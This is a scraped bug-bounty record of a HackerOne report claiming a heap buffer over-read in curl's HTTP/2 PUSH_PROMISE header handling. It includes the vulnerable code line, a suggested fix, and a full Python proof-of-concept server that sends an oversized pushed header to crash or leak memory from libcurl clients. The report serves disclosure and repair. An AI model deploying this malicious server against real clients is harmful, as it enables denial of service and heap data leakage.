{“lastseen”:”2025-12-28T21:30:18″,”description”:”## Summary:\\nI have discovered a Heap Buffer Over-read vulnerability in `lib\/http2.c` within the `on_header` callback function. When processing HTTP\/2 `PUSH_PROMISE` frames, the code incorrectly uses the `%s` format specifier on raw pointers provided by `nghttp2`.\\n\\nAccording to `nghttp2` documentation, the `name` and `value` pointers in the `on_header` callback are **not null-terminated**. By using `%s` without precision specifiers, `curl_maprintf` reads past the bounds of the allocated buffer into adjacent heap memory until it encounters a null byte. This leads to a Denial of Service (crash via OOM or invalid read) or potentially leaks sensitive heap memory.\\n\\n## Vulnerability Details\\n* **File:** `lib\/http2.c`\\n* **Function:** `on_header`\\n* **Vulnerable Logic:**\\n\\nInside the `on_header` function (handling `NGHTTP2_PUSH_PROMISE`), the code acts as follows:\\n\\n“`c\\n\/* lib\/http2.c around line 1642 in master *\/\\nh = curl_maprintf(\\”%s:%s\\”, name, value);\\nSince name and value are not null-terminated C-strings, curl_maprintf continues reading memory indefinitely.\\n\\nContrast with Secure Code: In the same file (handling trailers), the developers correctly used precision specifiers:\\n\/* Correct usage found elsewhere in the file *\/\\nCURL_TRC_CF(data, cf, \\”[%d] trailer: %.*s: %.*s\\”,\\n stream-\\u003eid, (int)namelen, name, (int)valuelen, value);\\n\\nAffected version\\nReproduced on the latest master branch (commit 752d… \/ curl 8.6.0-dev). Platform: Linux (Reproduced with ASAN build).\\n\\nSteps To Reproduce:\\nTo reproduce this issue, you need a malicious HTTP\/2 server that sends a PUSH_PROMISE frame with a payload that triggers the over-read.\\n\\nNote: While curl CLI disables HTTP\/2 Push by default, libcurl applications enabling it are vulnerable. For reproduction purposes using the CLI, we must ensure Push is enabled.\\n\\n1. Compile curl with AddressSanitizer (ASAN)\\n.\/configure –enable-debug –enable-curldebug –with-nghttp2 –with-openssl CFLAGS=\\”-fsanitize=address -g -O0\\” LDFLAGS=\\”-fsanitize=address\\”\\nmake -j4\\n\\n2. Setup Malicious Python Server Save the following script as repro.py. It requires pip install h2. (You also need server.key and server.crt for TLS).\\nimport socket\\nimport ssl\\nfrom h2.connection import H2Connection\\nfrom h2.events import RequestReceived\\nfrom h2.config import H2Configuration\\nfrom h2.settings import SettingCodes\\n\\ndef run_server():\\n host, port = ‘127.0.0.1’, 8443\\n ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)\\n ctx.load_cert_chain(certfile=\\”server.crt\\”, keyfile=\\”server.key\\”)\\n ctx.set_alpn_protocols([‘h2’])\\n\\n sock = socket.socket()\\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\\n sock.bind((host, port))\\n sock.listen(1)\\n print(f\\”Listening on {port}…\\”)\\n\\n while True:\\n conn, addr = sock.accept()\\n try:\\n tls_conn = ctx.wrap_socket(conn, server_side=True)\\n config = H2Configuration(client_side=False)\\n h2 = H2Connection(config=config)\\n h2.initiate_connection()\\n tls_conn.sendall(h2.data_to_send())\\n\\n while True:\\n data = tls_conn.recv(65535)\\n if not data: break\\n events = h2.receive_data(data)\\n for event in events:\\n if isinstance(event, RequestReceived):\\n # Force enable push in python state to bypass checks\\n h2.remote_settings[SettingCodes.ENABLE_PUSH] = 1\\n\\n # Payload: Long string without null terminator concept in H2\\n headers = [\\n (‘:method’, ‘GET’), (‘:path’, ‘\/pwn’),\\n (‘:scheme’, ‘https’), (‘:authority’, ‘localhost’),\\n (‘x-trigger’, ‘A’ * 5000)\\n ]\\n h2.push_stream(event.stream_id, 2, headers)\\n tls_conn.sendall(h2.data_to_send())\\n\\n tls_conn.sendall(h2.data_to_send())\\n except Exception:\\n pass\\n finally:\\n conn.close()\\n\\nif __name__ == ‘__main__’:\\n run_server()\\n\\n3. Run the Attack\\n- Terminal 1: python3 repro.py\\n- Terminal 2: .\/src\/curl -v -k –http2 https:\/\/127.0.0.1:8443 (Ensure the libcurl used accepts Push, or modify lib\/http2.c to force ENABLE_PUSH=1 for testing).\\n\\n4. Observe Results The curl process will either crash with an ASAN report or return error (56) … returned -902:The user callback function failed.\\n\\nThe error -902 confirms that on_header failed, likely due to memory allocation failure when curl_maprintf attempted to read gigabytes of heap data starting from the non-null-terminated buffer.\\n\\n## Impact\\n\\nImpact\\nThis is a heap buffer over-read.\\n1. Denial of Service: It causes the client to crash or exhaust memory.\\n2. Information Leak: It may leak adjacent heap data into the header string, which could be processed or logged by the application.\\n\\nRecommended Fix\\nUpdate the curl_maprintf call to use precision specifiers with the length provided by nghttp2:\\nh = curl_maprintf(\\”%.*s:%.*s\\”, (int)namelen, name, (int)valuelen, value);”,”published”:”2025-12-27T19:17:59″,”modified”:”2025-12-28T21:28:50″,”type”:”hackerone”,”title”:”curl: Heap Buffer Over-read in lib\/http2.c (on_header) handling PUSH_PROMISE frames”,”source”:””,”references”:””,”id”:”H1:3480078″,”bulletinFamily”:”bugbounty”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/hackerone.com\/reports\/3480078″,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-28T21:30:18″,”description”:”## Summary:\\nI have discovered a Heap Buffer Over-read vulnerability in `lib\/http2.c` within the `on_header` callback function. When processing HTTP\/2 `PUSH_PROMISE` frames, the code incorrectly uses…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,117,13,33,7,11,5],"class_list":["post-33047","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-hackerone","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n